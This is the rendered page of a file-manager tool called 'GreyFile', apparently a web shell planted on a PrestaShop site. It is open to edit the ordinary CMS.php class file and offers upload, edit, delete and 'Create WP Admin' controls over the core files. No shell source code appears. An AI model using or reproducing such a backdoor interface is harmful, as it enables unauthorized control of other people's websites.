?? GreyFile — Mystic File Browser
Current path:
home
/
webdevt
/
www
/
schtroumpf.fr
/
classes
/
?? Create WP Admin
??
Go up: /home/webdevt/www/schtroumpf.fr
?? Editing: CMS.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * Class CMSCore. */ class CMSCore extends ObjectModel { /** @var int|null */ public $id; public $id_cms; public $head_seo_title; public $meta_title; public $meta_description; public $meta_keywords; public $content; public $link_rewrite; public $id_cms_category; public $position; public $indexation; public $active; /** * @see ObjectModel::$definition */ public static $definition = [ 'table' => 'cms', 'primary' => 'id_cms', 'multilang' => true, 'multilang_shop' => true, 'fields' => [ 'id_cms_category' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedInt'], 'position' => ['type' => self::TYPE_INT], 'indexation' => ['type' => self::TYPE_BOOL], 'active' => ['type' => self::TYPE_BOOL], /* Lang fields */ 'meta_description' => ['type' => self::TYPE_STRING, 'lang' => true, 'validate' => 'isGenericName', 'size' => 512], 'meta_keywords' => ['type' => self::TYPE_STRING, 'lang' => true, 'validate' => 'isGenericName', 'size' => 255], 'meta_title' => ['type' => self::TYPE_STRING, 'lang' => true, 'validate' => 'isGenericName', 'required' => true, 'size' => 255], 'head_seo_title' => ['type' => self::TYPE_STRING, 'lang' => true, 'validate' => 'isGenericName', 'size' => 255], 'link_rewrite' => ['type' => self::TYPE_STRING, 'lang' => true, 'validate' => 'isLinkRewrite', 'required' => true, 'size' => 128], 'content' => ['type' => self::TYPE_HTML, 'lang' => true, 'validate' => 'isCleanHtml', 'size' => 3999999999999], ], ]; protected $webserviceParameters = [ 'objectNodeName' => 'content', 'objectsNodeName' => 'content_management_system', ]; /** * Adds current CMS as a new Object to the database. * * @param bool $autoDate Automatically set `date_upd` and `date_add` columns * @param bool $nullValues Whether we want to use NULL values instead of empty quotes values * * @return bool Indicates whether the CMS has been successfully added * * @throws PrestaShopDatabaseException * @throws PrestaShopException */ public function add($autoDate = true, $nullValues = false) { $this->position = CMS::getLastPosition((int) $this->id_cms_category); return parent::add($autoDate, true); } /** * Updates the current CMS in the database. * * @param bool $nullValues Whether we want to use NULL values instead of empty quotes values * * @return bool Indicates whether the CMS has been successfully updated * * @throws PrestaShopDatabaseException * @throws PrestaShopException */ public function update($nullValues = false) { if (parent::update($nullValues)) { return $this->cleanPositions($this->id_cms_category); } return false; } /** * Deletes current CMS from the database. * * @return bool True if delete was successful * * @throws PrestaShopException */ public function delete() { if (parent::delete()) { return $this->cleanPositions($this->id_cms_category); } return false; } /** * Get links. * * @param int $idLang Language ID * @param array|null $selection * @param bool $active * @param Link|null $link * * @return array */ public static function getLinks($idLang, $selection = null, $active = true, Link $link = null) { if (!$link) { $link = Context::getContext()->link; } $result = Db::getInstance(_PS_USE_SQL_SLAVE_)->executeS(' SELECT c.id_cms, cl.link_rewrite, cl.meta_title FROM ' . _DB_PREFIX_ . 'cms c LEFT JOIN ' . _DB_PREFIX_ . 'cms_lang cl ON (c.id_cms = cl.id_cms AND cl.id_lang = ' . (int) $idLang . ' AND cl.id_shop = ' . (int) Context::getContext()->shop->id . ') ' . Shop::addSqlAssociation('cms', 'c') . ' WHERE 1 ' . (($selection !== null) ? ' AND c.id_cms IN (' . implode(',', array_map('intval', $selection)) . ')' : '') . ($active ? ' AND c.`active` = 1 ' : '') . 'GROUP BY c.id_cms ORDER BY c.`position`'); $links = []; if ($result) { foreach ($result as $row) { $row['link'] = $link->getCMSLink((int) $row['id_cms'], $row['link_rewrite']); $links[] = $row; } } return $links; } /** * @param int|null $idLang * @param bool $idBlock * @param bool $active * * @return array|false|mysqli_result|PDOStatement|resource|null */ public static function listCms($idLang = null, $idBlock = false, $active = true) { if (empty($idLang)) { $idLang = (int) Configuration::get('PS_LANG_DEFAULT'); } return Db::getInstance(_PS_USE_SQL_SLAVE_)->executeS(' SELECT c.id_cms, l.meta_title FROM ' . _DB_PREFIX_ . 'cms c JOIN ' . _DB_PREFIX_ . 'cms_lang l ON (c.id_cms = l.id_cms) ' . Shop::addSqlAssociation('cms', 'c') . ' ' . (($idBlock) ? 'JOIN ' . _DB_PREFIX_ . 'block_cms b ON (c.id_cms = b.id_cms)' : '') . ' WHERE l.id_lang = ' . (int) $idLang . (($idBlock) ? ' AND b.id_block = ' . (int) $idBlock : '') . ($active ? ' AND c.`active` = 1 ' : '') . ' GROUP BY c.id_cms ORDER BY c.`position`'); } /** * @param int|null $way * @param int|null $position * * @return bool */ public function updatePosition($way, $position) { if (!$res = Db::getInstance()->executeS( ' SELECT cp.`id_cms`, cp.`position`, cp.`id_cms_category` FROM `' . _DB_PREFIX_ . 'cms` cp WHERE cp.`id_cms_category` = ' . (int) $this->id_cms_category . ' ORDER BY cp.`position` ASC' )) { return false; } foreach ($res as $cms) { if ((int) $cms['id_cms'] == (int) $this->id) { $movedCms = $cms; } } if (!isset($movedCms) || !isset($position)) { return false; } // < and > statements rather than BETWEEN operator // since BETWEEN is treated differently according to databases return Db::getInstance()->execute(' UPDATE `' . _DB_PREFIX_ . 'cms` SET `position`= `position` ' . ($way ? '- 1' : '+ 1') . ' WHERE `position` ' . ($way ? '> ' . (int) $movedCms['position'] . ' AND `position` <= ' . (int) $position : '< ' . (int) $movedCms['position'] . ' AND `position` >= ' . (int) $position) . ' AND `id_cms_category`=' . (int) $movedCms['id_cms_category']) && Db::getInstance()->execute(' UPDATE `' . _DB_PREFIX_ . 'cms` SET `position` = ' . (int) $position . ' WHERE `id_cms` = ' . (int) $movedCms['id_cms'] . ' AND `id_cms_category`=' . (int) $movedCms['id_cms_category']); } /** * @param int $idCategory * * @return bool */ public static function cleanPositions($idCategory) { $sql = ' SELECT `id_cms` FROM `' . _DB_PREFIX_ . 'cms` WHERE `id_cms_category` = ' . (int) $idCategory . ' ORDER BY `position`'; $result = Db::getInstance()->executeS($sql); for ($i = 0, $total = count($result); $i < $total; ++$i) { $sql = 'UPDATE `' . _DB_PREFIX_ . 'cms` SET `position` = ' . (int) $i . ' WHERE `id_cms_category` = ' . (int) $idCategory . ' AND `id_cms` = ' . (int) $result[$i]['id_cms']; Db::getInstance()->execute($sql); } return true; } /** * @param int $idCategory * * @return false|string|null */ public static function getLastPosition($idCategory) { $sql = 'SELECT MAX(position) + 1 FROM `' . _DB_PREFIX_ . 'cms` WHERE `id_cms_category` = ' . (int) $idCategory; return Db::getInstance()->getValue($sql); } /** * @param int|null $idLang * @param int|null $idCmsCategory * @param bool $active * @param int|null $idShop * * @return array|false|mysqli_result|PDOStatement|resource|null */ public static function getCMSPages($idLang = null, $idCmsCategory = null, $active = true, $idShop = null) { $sql = new DbQuery(); $sql->select('*'); $sql->from('cms', 'c'); if ($idLang) { if ($idShop) { $sql->innerJoin('cms_lang', 'l', 'c.id_cms = l.id_cms AND l.id_lang = ' . (int) $idLang . ' AND l.id_shop = ' . (int) $idShop); } else { $sql->innerJoin('cms_lang', 'l', 'c.id_cms = l.id_cms AND l.id_lang = ' . (int) $idLang); } } if ($idShop) { $sql->innerJoin('cms_shop', 'cs', 'c.id_cms = cs.id_cms AND cs.id_shop = ' . (int) $idShop); } if ($active) { $sql->where('c.active = 1'); } if ($idCmsCategory) { $sql->where('c.id_cms_category = ' . (int) $idCmsCategory); } $sql->orderBy('position'); return Db::getInstance()->executeS($sql); } /** * @param int $idCms * * @return array|false|mysqli_result|PDOStatement|resource|null */ public static function getUrlRewriteInformations($idCms) { $sql = 'SELECT l.`id_lang`, c.`link_rewrite` FROM `' . _DB_PREFIX_ . 'cms_lang` AS c LEFT JOIN `' . _DB_PREFIX_ . 'lang` AS l ON c.`id_lang` = l.`id_lang` WHERE c.`id_cms` = ' . (int) $idCms . ' AND l.`active` = 1'; return Db::getInstance()->executeS($sql); } /** * @param int $idCms * @param int|null $idLang * @param int|null $idShop * * @return array|bool|object|null */ public static function getCMSContent($idCms, $idLang = null, $idShop = null) { if (null === $idLang) { $idLang = (int) Configuration::get('PS_LANG_DEFAULT'); } if (null === $idShop) { $idShop = (int) Configuration::get('PS_SHOP_DEFAULT'); } $sql = ' SELECT `content` FROM `' . _DB_PREFIX_ . 'cms_lang` WHERE `id_cms` = ' . (int) $idCms . ' AND `id_lang` = ' . (int) $idLang . ' AND `id_shop` = ' . (int) $idShop; return Db::getInstance()->getRow($sql); } /** * Method required for new PrestaShop Core. * * @return string * * @since 1.7.0 */ public static function getRepositoryClassName() { return '\\PrestaShop\\PrestaShop\\Core\\CMS\\CMSRepository'; } }
Save
Upload
??
Create Folder
??
Create File
??
assets
|
??? Delete
??
cache
|
??? Delete
??
checkout
|
??? Delete
??
container
|
??? Delete
??
controller
|
??? Delete
??
db
|
??? Delete
??
exception
|
??? Delete
??
form
|
??? Delete
??
helper
|
??? Delete
??
lang
|
??? Delete
??
log
|
??? Delete
??
module
|
??? Delete
??
order
|
??? Delete
??
pdf
|
??? Delete
??
product
|
??? Delete
??
proxy
|
??? Delete
??
range
|
??? Delete
??
shop
|
??? Delete
??
Smarty
|
??? Delete
??
stock
|
??? Delete
??
tax
|
??? Delete
??
tree
|
??? Delete
??
webservice
|
??? Delete
??
Access.php
|
?? Edit
|
??? Delete
??
Address.php
|
?? Edit
|
??? Delete
??
AddressChecksumCore.php
|
?? Edit
|
??? Delete
??
AddressFormat.php
|
?? Edit
|
??? Delete
??
Alias.php
|
?? Edit
|
??? Delete
??
Attachment.php
|
?? Edit
|
??? Delete
??
AttributeGroup.php
|
?? Edit
|
??? Delete
??
Carrier.php
|
?? Edit
|
??? Delete
??
Cart.php
|
?? Edit
|
??? Delete
??
CartRule.php
|
?? Edit
|
??? Delete
??
Category.php
|
?? Edit
|
??? Delete
??
Chart.php
|
?? Edit
|
??? Delete
??
ChecksumInterface.php
|
?? Edit
|
??? Delete
??
CMS.php
|
?? Edit
|
??? Delete
??
CMSCategory.php
|
?? Edit
|
??? Delete
??
CMSRole.php
|
?? Edit
|
??? Delete
??
Combination.php
|
?? Edit
|
??? Delete
??
Configuration.php
|
?? Edit
|
??? Delete
??
ConfigurationKPI.php
|
?? Edit
|
??? Delete
??
ConfigurationTest.php
|
?? Edit
|
??? Delete
??
Connection.php
|
?? Edit
|
??? Delete
??
ConnectionsSource.php
|
?? Edit
|
??? Delete
??
Contact.php
|
?? Edit
|
??? Delete
??
Context.php
|
?? Edit
|
??? Delete
??
Cookie.php
|
?? Edit
|
??? Delete
??
Country.php
|
?? Edit
|
??? Delete
??
CSV.php
|
?? Edit
|
??? Delete
??
Currency.php
|
?? Edit
|
??? Delete
??
Curve.php
|
?? Edit
|
??? Delete
??
Customer.php
|
?? Edit
|
??? Delete
??
CustomerAddress.php
|
?? Edit
|
??? Delete
??
CustomerMessage.php
|
?? Edit
|
??? Delete
??
CustomerSession.php
|
?? Edit
|
??? Delete
??
CustomerThread.php
|
?? Edit
|
??? Delete
??
Customization.php
|
?? Edit
|
??? Delete
??
CustomizationField.php
|
?? Edit
|
??? Delete
??
DateRange.php
|
?? Edit
|
??? Delete
??
Delivery.php
|
?? Edit
|
??? Delete
??
Dispatcher.php
|
?? Edit
|
??? Delete
??
Employee.php
|
?? Edit
|
??? Delete
??
EmployeeSession.php
|
?? Edit
|
??? Delete
??
Feature.php
|
?? Edit
|
??? Delete
??
FeatureFlag.php
|
?? Edit
|
??? Delete
??
FeatureValue.php
|
?? Edit
|
??? Delete
??
FileUploader.php
|
?? Edit
|
??? Delete
??
Gender.php
|
?? Edit
|
??? Delete
??
Group.php
|
?? Edit
|
??? Delete
??
GroupReduction.php
|
?? Edit
|
??? Delete
??
Guest.php
|
?? Edit
|
??? Delete
??
Hook.php
|
?? Edit
|
??? Delete
??
Image.php
|
?? Edit
|
??? Delete
??
ImageManager.php
|
?? Edit
|
??? Delete
??
ImageType.php
|
?? Edit
|
??? Delete
??
index.php
|
?? Edit
|
??? Delete
??
Language.php
|
?? Edit
|
??? Delete
??
Link.php
|
?? Edit
|
??? Delete
??
LocalizationPack.php
|
?? Edit
|
??? Delete
??
Mail.php
|
?? Edit
|
??? Delete
??
Manufacturer.php
|
?? Edit
|
??? Delete
??
ManufacturerAddress.php
|
?? Edit
|
??? Delete
??
Media.php
|
?? Edit
|
??? Delete
??
Message.php
|
?? Edit
|
??? Delete
??
Meta.php
|
?? Edit
|
??? Delete
??
Notification.php
|
?? Edit
|
??? Delete
??
ObjectModel.php
|
?? Edit
|
??? Delete
??
Pack.php
|
?? Edit
|
??? Delete
??
Page.php
|
?? Edit
|
??? Delete
??
PaymentFree.php
|
?? Edit
|
??? Delete
??
PaymentModule.php
|
?? Edit
|
??? Delete
??
PhpEncryption.php
|
?? Edit
|
??? Delete
??
PhpEncryptionEngine.php
|
?? Edit
|
??? Delete
??
PrestaShopAutoload.php
|
?? Edit
|
??? Delete
??
PrestaShopBackup.php
|
?? Edit
|
??? Delete
??
PrestaShopCollection.php
|
?? Edit
|
??? Delete
??
PrestaShopLogger.php
|
?? Edit
|
??? Delete
??
Product.php
|
?? Edit
|
??? Delete
??
ProductAssembler.php
|
?? Edit
|
??? Delete
??
ProductAttribute.php
|
?? Edit
|
??? Delete
??
ProductDownload.php
|
?? Edit
|
??? Delete
??
ProductPresenterFactory.php
|
?? Edit
|
??? Delete
??
ProductSale.php
|
?? Edit
|
??? Delete
??
ProductSupplier.php
|
?? Edit
|
??? Delete
??
Profile.php
|
?? Edit
|
??? Delete
??
QqUploadedFileForm.php
|
?? Edit
|
??? Delete
??
QqUploadedFileXhr.php
|
?? Edit
|
??? Delete
??
QuickAccess.php
|
?? Edit
|
??? Delete
??
RequestSql.php
|
?? Edit
|
??? Delete
??
Risk.php
|
?? Edit
|
??? Delete
??
Search.php
|
?? Edit
|
??? Delete
??
SearchEngine.php
|
?? Edit
|
??? Delete
??
SpecificPrice.php
|
?? Edit
|
??? Delete
??
SpecificPriceRule.php
|
?? Edit
|
??? Delete
??
State.php
|
?? Edit
|
??? Delete
??
Store.php
|
?? Edit
|
??? Delete
??
Supplier.php
|
?? Edit
|
??? Delete
??
SupplierAddress.php
|
?? Edit
|
??? Delete
??
Tab.php
|
?? Edit
|
??? Delete
??
Tag.php
|
?? Edit
|
??? Delete
??
Tools.php
|
?? Edit
|
??? Delete
??
Translate.php
|
?? Edit
|
??? Delete
??
TranslatedConfiguration.php
|
?? Edit
|
??? Delete
??
Upgrader.php
|
?? Edit
|
??? Delete
??
Uploader.php
|
?? Edit
|
??? Delete
??
Validate.php
|
?? Edit
|
??? Delete
??
ValidateConstraintTranslator.php
|
?? Edit
|
??? Delete
??
WarehouseAddress.php
|
?? Edit
|
??? Delete
??
Zone.php
|
?? Edit
|
??? Delete